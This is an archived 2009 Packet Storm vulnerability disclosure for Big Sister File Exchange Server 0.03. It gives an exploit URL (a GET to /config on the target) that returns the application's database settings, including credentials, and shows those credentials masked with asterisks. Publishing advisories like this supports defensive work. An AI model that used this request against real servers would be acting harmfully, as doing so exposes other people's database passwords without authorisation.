Big Sister File Exchange Server 0.03 Disclosure

2009-07-08T00:00:00
ID PACKETSTORM:79006
Type packetstorm
Reporter Septemb0x
Modified 2009-07-08T00:00:00

Description

                                        
                                            `  
< ------------------- header data start ------------------- >  
  
#############################################################  
  
# Application Name : Big Sister File Exchange Server 0.03  
  
# Vulnerable Type : Arbitrary Db Config Download Vulnerability  
  
# Infection : SQL Info Get...  
  
# Author : Septemb0x  
  
# Script Down.& WebSite : http://sourceforge.net/projects/bigsifes/files/bigsifes/bigsifes-0.03.tgz  
  
#############################################################  
  
< ------------------- header data end of ------------------- >  
  
< -- bug code start -- >  
  
EXPLOIT :   
http://[target]/[path]/config  
  
GET TO;  
  
dbhost=*******  
dbuser=*******  
dbpassword=*******  
db=*******  
documentroot=*******  
registermail=*******  
fileowner=*******  
  
< -- bug code end of -- >  
  
# Greetz : BHDR & BARCOD3  
_________________________________________________________________  
Sürükle ve Býrak: Windows Live™ Photos ile fotoðraflarýnýzý kolayca paylaþýmý.  
http://www.microsoft.com/turkiye/windows/windowslive/photos.aspx`